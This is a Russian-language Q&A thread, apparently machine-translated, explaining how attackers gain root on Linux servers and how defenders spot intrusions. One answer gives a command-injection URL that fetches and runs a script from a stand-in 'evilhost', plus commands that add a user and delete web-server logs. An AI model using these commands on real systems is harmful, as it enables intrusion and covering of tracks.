Нет, я не собираюсь становиться взломщиком или что-то в этом роде, но я пытаюсь понять процесс (больше с точки зрения программирования).
Итак, я предполагаю (догадываюсь), что основная цель взломщика - получить root-доступ для установки любого программного обеспечения (или сценария), которое он написал, верно? или, может быть, установка своего собственного модуля Kernal (который по какой-либо причине является хитрым) Как именно человек поступает так?
Я знаю, что люди используют скрипты для проверки подвигов ...... но я не понимаю, как, и я также не совсем понимаю, что они делают с ними, когда они их находят? Они проверяют версии на наличие известных подвигов ...... а затем, когда они находят один .......
Я знаю, что все это звучит как новенькое. но я просто пытаюсь понять, как это работает, так как я знаю, что системы Linux / Unix должны быть очень безопасными, но я пытаюсь выяснить, как кто-то вообще может (процесс) получить root-доступ.
Наибольшим фактором является тип доступа, который имеет злоумышленник. Если у них есть физический доступ, вы облажались. Если вас интересует только удаленный доступ, то это зависит от того, что у вас работает; хорошая конфигурация это все. Стандартный сервер Linux, вероятно, будет работать с ftp, ssh, http, https и mysql. SSH безопасен, но я бы не разрешил вход с правами root, и хороший пароль для каждой учетной записи является обязательным. FTP ударил или пропустил. Если у вас есть VSFTP и вы можете выполнять настройку своих пользователей, это очень безопасно. Несколько других версий имеют известные уязвимости. HTTP, вероятно, будет вашей самой уязвимой областью. Ваша самая большая проблема здесь - все, что выполняет файлы в системе или загружает файлы в систему. Внедрение SQL ОЧЕНЬ сложно, если ваш сайт сделан на PHP5. Группа студентов, занимающихся вопросами безопасности, и я несколько недель пробовали инъекции SQL-кода на неанизированном веб-сайте PHP5, но безуспешно. С MySQL обязательно используйте пользователя без полномочий root и ограничьте его для входа только с вашего сервера Apache.
Есть пара плагинов Firefox для тестирования уязвимостей веб-сайтов: access me, xss me и sql инъекция меня
Некоторые важные вещи, которые я всегда делал на соревнованиях для обеспечения безопасности:
netstat
- проверить открытые порты и соединения,w
- кто вошел в систему, как долго,ps
- запуск команд,/etc/passwd
для дополнительных пользователей/etc/sudoers
для доступа sudo.Обычно после получения доступа злоумышленник хочет получить root. В настоящее время существует несколько уязвимостей, связанных с повышением привилегий, которые позволяют обычному пользователю получить права root. После этого они хотят открыть его для последующего доступа, добавив пользователей и открыв задние двери.
Вот сайт моей школы по киберзащите. Не стесняйтесь осмотреться и задать несколько вопросов: https://thislink.doesntexist.org/
источник
Безопасность системы зависит от навыков администратора (ов), поэтому неправильно говорить «системы Linux / Unix должны быть очень безопасными» :)
Теперь перейдем к взлому ... Существует своего рода инструмент, называемый " сканер уязвимостей ", такой как Nessus, который ищет вещи для эксплуатации. Есть тысячи вещей, которые могут пойти не так в сложной системе, такой как неправильно настроенный сервер Apache, чтобы разрешить загрузку произвольных файлов в произвольные места. Они могут служить отправной точкой для дальнейших действий, таких как получение доступа к базе данных или учетной записи электронной почты, с которой пароли можно восстановить с помощью функции «забыть пароль».
Иногда взломать это получить доступ и сделать что-то злое. Иногда люди делают это ради забавы (что, кстати, глупо).
И вот история знаменитого взлома, который произошел совсем недавно. Я думаю, что это будет показательным для всех, кто смотрит на безопасность! Чтобы процитировать резюме подвигов:
источник
Векторов атаки так много, что они почти бесконечны. Одна из самых простых концептуальных концепций - сделать программу общедоступной и заявить, что она делает что-то иное, чем на самом деле. Дайте пользователям дружественные инструкции с
sudo
самого начала и наблюдайте, как мир развивается. Это происходит каждый день с программами с закрытым исходным кодом, поскольку одному человеку невозможно заранее проверить его работу, как, например, на компакт-дисках Sony .Вы также можете попробовать отправить специальные строки на удаленный хост. В качестве высокоуровневого примера, скажем, у вас есть веб-сервер с запущенным на нем программным обеспечением, и это программное обеспечение запускает часть URL-адреса как команду, не экранируя или иным образом не гарантируя, что оно не может причинить никакого вреда. Отправить что - то вроде
http://www.example.org/search?q=foo%3Bwget%20http%3A%2F%2Fevilhost%2Fscript.sh%3B%20chmod%20u%2Bx%20script.sh%3B%20.%2Fscript.sh
. Декодируется строка поиска . Если это будет выполнено, script.sh будет работать с теми же правами доступа, что и пользователь веб-сервера, для выполнения каких-либо действий на компьютере. Иногда люди допускают, чтобы они работали как root для «удобства», в данном случае это синоним лени и / или невежества. Даже если он не запущен с правами root, этот сценарий может запустить тысячи тестов для других дыр в установленном программном обеспечении и выполнить другую команду, если найдет такую. Последняя команда может быть, например,foo;wget http://evilhost/script.sh; chmod u+x script.sh; ./script.sh
useradd blabla; apt-get install openssh; rm /var/log/apache.log
, чтобы получить доступ по SSH и удалить следы взлома.[команды были явно упрощены и, вероятно, не сработали бы в любом случае. YMMV]
источник